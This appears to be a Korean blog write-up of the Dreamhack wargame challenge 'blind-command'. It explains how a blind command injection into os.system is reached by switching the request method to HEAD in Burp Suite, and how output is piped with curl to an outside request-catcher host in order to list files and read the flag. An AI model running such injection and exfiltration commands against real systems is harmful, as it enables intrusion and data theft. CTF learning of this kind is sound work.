blind-command

2024. 5. 26. 15:36웹 해킹/Dreamhack Wargame

Command Injection 문제. Blind가 들어가니 결과값이 보이지 않는듯하다

 

Code

파라미터로 cmd값을 보낼 수 있고 cmd는 os.system(cmd)로 시스템 명령어 전송

단, GET 방식으로만 HTTP Method를 받는데 GET 방식이면 명령어 전송이 안된다.

 

이럴땐 HEAD 메소드로 보내면 된다.

메소드를 변경해야 하므로 Burp Suite를 사용한다.

FLAG

flag를 읽기 위해서 먼저 flag파일이 어디있는지를 알아야 한다.

ls 명령어를 사용하고 결과값을 받아와야 하므로 파이프 구문을 사용한다

ls | curl -X POST —data-binary @- https://rxwyuex.request.dreamhack.games

 

Dreamhack Tools에서 request값을 받아주는 기능을 사용한다.

명령어를 보내기 위해 burp suite를 실행한다.

 

GET ⇒ HEAD

현재 디렉터리에 flag.py가 존재한다.

cat flag.py로 값을 읽어온다.

 

똑같이 burp suite로 GET⇒HEAD를 하면

 

'웹 해킹 > Dreamhack Wargame' 카테고리의 다른 글

csrf-2  (0) 2024.05.26
csrf-1  (0) 2024.05.26
command-injection-chatgpt  (0) 2024.05.26
error based sql injection  (0) 2024.05.26
blind sql injection advanced  (0) 2024.05.26